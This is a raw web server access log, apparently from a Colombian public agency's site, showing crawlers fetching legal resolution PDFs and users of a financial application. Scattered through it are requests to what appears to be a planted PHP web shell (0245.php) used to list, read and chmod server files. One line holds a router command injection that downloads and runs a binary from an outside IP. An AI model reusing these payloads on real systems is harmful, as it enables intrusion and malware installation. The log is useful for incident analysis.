47.128.120.244 - - [26/Apr/2024:07:09:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page44.swf&ft=notepad HTTP/1.1" 200 76891
181.53.12.229 - - [26/Apr/2024:07:09:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2148155
23.22.35.162 - - [26/Apr/2024:07:09:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0983.pdf HTTP/1.1" 200 251045
23.22.35.162 - - [26/Apr/2024:07:09:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0982.pdf HTTP/1.1" 200 251333
52.70.240.171 - - [26/Apr/2024:07:09:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0981.pdf HTTP/1.1" 200 245118
66.249.66.13 - - [26/Apr/2024:07:09:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/0718.pdf HTTP/1.1" 200 171332
52.70.240.171 - - [26/Apr/2024:07:09:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0980.pdf HTTP/1.1" 200 253331
52.70.240.171 - - [26/Apr/2024:07:09:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0979.pdf HTTP/1.1" 200 218115
47.128.18.125 - - [26/Apr/2024:07:09:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmaderas%5Cimages&f=page110_thumbnail.jpg HTTP/1.1" 200 2901
3.224.220.101 - - [26/Apr/2024:07:09:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0978.pdf HTTP/1.1" 200 394492
52.70.240.171 - - [26/Apr/2024:07:09:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0977.pdf HTTP/1.1" 200 264185
3.224.220.101 - - [26/Apr/2024:07:09:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0976.pdf HTTP/1.1" 200 245839
23.22.35.162 - - [26/Apr/2024:07:09:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0975.pdf HTTP/1.1" 200 689623
23.22.35.162 - - [26/Apr/2024:07:09:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0974.pdf HTTP/1.1" 200 235587
23.22.35.162 - - [26/Apr/2024:07:09:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0973.pdf HTTP/1.1" 200 453231
66.249.66.11 - - [26/Apr/2024:07:09:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0691.pdf HTTP/1.1" 200 226862
47.128.18.152 - - [26/Apr/2024:07:09:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&f=page42.swf&fullhexdump=1 HTTP/1.1" 200 3019
47.128.18.152 - - [26/Apr/2024:07:09:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.18.152 - - [26/Apr/2024:07:09:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.18.152 - - [26/Apr/2024:07:09:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.18.152 - - [26/Apr/2024:07:09:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
47.128.18.152 - - [26/Apr/2024:07:09:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.18.152 - - [26/Apr/2024:07:09:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.18.152 - - [26/Apr/2024:07:09:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.18.152 - - [26/Apr/2024:07:09:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.18.152 - - [26/Apr/2024:07:09:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.18.152 - - [26/Apr/2024:07:09:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
52.70.240.171 - - [26/Apr/2024:07:09:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0972.pdf HTTP/1.1" 200 197520
52.70.240.171 - - [26/Apr/2024:07:09:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0971.pdf HTTP/1.1" 200 197709
23.22.35.162 - - [26/Apr/2024:07:09:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0970.pdf HTTP/1.1" 200 215290
23.22.35.162 - - [26/Apr/2024:07:10:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0969.pdf HTTP/1.1" 200 422398
52.70.240.171 - - [26/Apr/2024:07:10:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0968.pdf HTTP/1.1" 200 515746
52.70.240.171 - - [26/Apr/2024:07:10:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0967.pdf HTTP/1.1" 200 212900
47.128.47.122 - - [26/Apr/2024:07:10:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts&f=edcats.php HTTP/1.1" 200 4636
47.128.47.122 - - [26/Apr/2024:07:10:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.47.122 - - [26/Apr/2024:07:10:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.47.122 - - [26/Apr/2024:07:10:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.47.122 - - [26/Apr/2024:07:10:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.47.122 - - [26/Apr/2024:07:10:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
3.224.220.101 - - [26/Apr/2024:07:10:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0966.pdf HTTP/1.1" 200 238579
47.128.47.122 - - [26/Apr/2024:07:10:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.47.122 - - [26/Apr/2024:07:10:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.47.122 - - [26/Apr/2024:07:10:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.47.122 - - [26/Apr/2024:07:10:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.47.122 - - [26/Apr/2024:07:10:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
52.70.240.171 - - [26/Apr/2024:07:10:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0965.pdf HTTP/1.1" 200 363941
23.22.35.162 - - [26/Apr/2024:07:10:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0964.pdf HTTP/1.1" 200 198044
23.22.35.162 - - [26/Apr/2024:07:10:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0963.pdf HTTP/1.1" 200 328270
23.22.35.162 - - [26/Apr/2024:07:10:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0962.pdf HTTP/1.1" 200 374614
23.22.35.162 - - [26/Apr/2024:07:10:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0961.pdf HTTP/1.1" 200 293706
47.128.121.70 - - [26/Apr/2024:07:10:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts&f=color.php HTTP/1.1" 200 3303
3.224.220.101 - - [26/Apr/2024:07:10:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0960.pdf HTTP/1.1" 200 165611
47.128.121.70 - - [26/Apr/2024:07:10:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.121.70 - - [26/Apr/2024:07:10:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.121.70 - - [26/Apr/2024:07:10:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.121.70 - - [26/Apr/2024:07:10:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.121.70 - - [26/Apr/2024:07:10:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.121.70 - - [26/Apr/2024:07:10:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.121.70 - - [26/Apr/2024:07:10:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.121.70 - - [26/Apr/2024:07:10:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.121.70 - - [26/Apr/2024:07:10:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.121.70 - - [26/Apr/2024:07:10:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
3.224.220.101 - - [26/Apr/2024:07:10:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0959.pdf HTTP/1.1" 200 186451
23.22.35.162 - - [26/Apr/2024:07:10:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0958.pdf HTTP/1.1" 200 197708
23.22.35.162 - - [26/Apr/2024:07:10:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0957.pdf HTTP/1.1" 200 294445
23.22.35.162 - - [26/Apr/2024:07:10:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0956.pdf HTTP/1.1" 200 175894
3.224.220.101 - - [26/Apr/2024:07:10:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0955.pdf HTTP/1.1" 200 207966
172.22.2.4 - - [26/Apr/2024:07:09:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.54.219 - - [26/Apr/2024:07:10:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page100.swf HTTP/1.1" 200 3022
47.128.54.219 - - [26/Apr/2024:07:11:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.54.219 - - [26/Apr/2024:07:11:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_swf HTTP/1.1" 200 254
47.128.54.219 - - [26/Apr/2024:07:11:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.54.219 - - [26/Apr/2024:07:11:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.54.219 - - [26/Apr/2024:07:11:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.54.219 - - [26/Apr/2024:07:11:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
52.70.240.171 - - [26/Apr/2024:07:11:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0954.pdf HTTP/1.1" 200 184065
47.128.54.219 - - [26/Apr/2024:07:11:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.54.219 - - [26/Apr/2024:07:11:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.54.219 - - [26/Apr/2024:07:11:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.54.219 - - [26/Apr/2024:07:11:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
52.70.240.171 - - [26/Apr/2024:07:11:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0953.pdf HTTP/1.1" 200 293944
52.70.240.171 - - [26/Apr/2024:07:11:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0952.pdf HTTP/1.1" 200 285157
23.22.35.162 - - [26/Apr/2024:07:11:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0951.pdf HTTP/1.1" 200 421446
52.70.240.171 - - [26/Apr/2024:07:11:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0950.pdf HTTP/1.1" 200 218276
23.22.35.162 - - [26/Apr/2024:07:11:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0949.pdf HTTP/1.1" 200 375950
3.224.220.101 - - [26/Apr/2024:07:11:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0948.pdf HTTP/1.1" 200 239061
47.128.54.156 - - [26/Apr/2024:07:11:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Ci%5C&sort=2d HTTP/1.1" 200 3734
47.128.54.156 - - [26/Apr/2024:07:11:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.54.156 - - [26/Apr/2024:07:11:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
181.154.118.29 - - [26/Apr/2024:07:11:27 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.154.118.29 - - [26/Apr/2024:07:11:27 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:27 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12403
181.154.118.29 - - [26/Apr/2024:07:11:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:28 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
52.70.240.171 - - [26/Apr/2024:07:11:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0947.pdf HTTP/1.1" 200 268279
3.224.220.101 - - [26/Apr/2024:07:11:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0946.pdf HTTP/1.1" 200 327363
181.154.118.29 - - [26/Apr/2024:07:11:36 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16279
181.154.118.29 - - [26/Apr/2024:07:11:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:36 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.154.118.29 - - [26/Apr/2024:07:11:37 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
23.22.35.162 - - [26/Apr/2024:07:11:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0945.pdf HTTP/1.1" 200 587743
3.224.220.101 - - [26/Apr/2024:07:11:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0944.pdf HTTP/1.1" 200 344148
181.154.118.29 - - [26/Apr/2024:07:11:43 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:43 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
181.154.118.29 - - [26/Apr/2024:07:11:44 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 40403
181.154.118.29 - - [26/Apr/2024:07:11:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1440
52.70.240.171 - - [26/Apr/2024:07:11:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0943.pdf HTTP/1.1" 200 206112
179.43.190.218 - - [26/Apr/2024:07:11:48 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 1018
23.22.35.162 - - [26/Apr/2024:07:11:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0942.pdf HTTP/1.1" 200 256978
181.154.118.29 - - [26/Apr/2024:07:11:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 2133
47.128.54.195 - - [26/Apr/2024:07:11:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=.. HTTP/1.1" 200 2884
172.22.2.4 - - [26/Apr/2024:07:10:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
181.154.118.29 - - [26/Apr/2024:07:11:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 38434
181.154.118.29 - - [26/Apr/2024:07:11:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:51 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:11:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 31737
3.224.220.101 - - [26/Apr/2024:07:11:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0941.pdf HTTP/1.1" 200 205467
181.154.118.29 - - [26/Apr/2024:07:11:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12923
23.22.35.162 - - [26/Apr/2024:07:11:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0940.pdf HTTP/1.1" 200 68075
52.70.240.171 - - [26/Apr/2024:07:12:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0939.pdf HTTP/1.1" 200 187370
3.224.220.101 - - [26/Apr/2024:07:12:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0938.pdf HTTP/1.1" 200 66880
186.80.88.32 - - [26/Apr/2024:07:12:05 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
186.80.88.32 - - [26/Apr/2024:07:12:05 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12403
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
186.80.88.32 - - [26/Apr/2024:07:12:06 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
201.245.192.253 - - [26/Apr/2024:07:12:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41015
23.22.35.162 - - [26/Apr/2024:07:12:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0937.pdf HTTP/1.1" 200 760012
47.128.98.224 - - [26/Apr/2024:07:12:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.98.224 - - [26/Apr/2024:07:12:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.98.224 - - [26/Apr/2024:07:12:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.98.224 - - [26/Apr/2024:07:12:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
52.70.240.171 - - [26/Apr/2024:07:12:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0936.pdf HTTP/1.1" 200 258259
47.128.98.224 - - [26/Apr/2024:07:12:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.98.224 - - [26/Apr/2024:07:12:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.98.224 - - [26/Apr/2024:07:12:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.98.224 - - [26/Apr/2024:07:12:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.98.224 - - [26/Apr/2024:07:12:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.98.224 - - [26/Apr/2024:07:12:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.98.224 - - [26/Apr/2024:07:12:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages%5C&f=page93_thumbnail.jpg&imgsize=20 HTTP/1.1" 200 16267
186.80.88.32 - - [26/Apr/2024:07:12:19 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11222
186.80.88.32 - - [26/Apr/2024:07:12:19 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
186.80.88.32 - - [26/Apr/2024:07:12:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
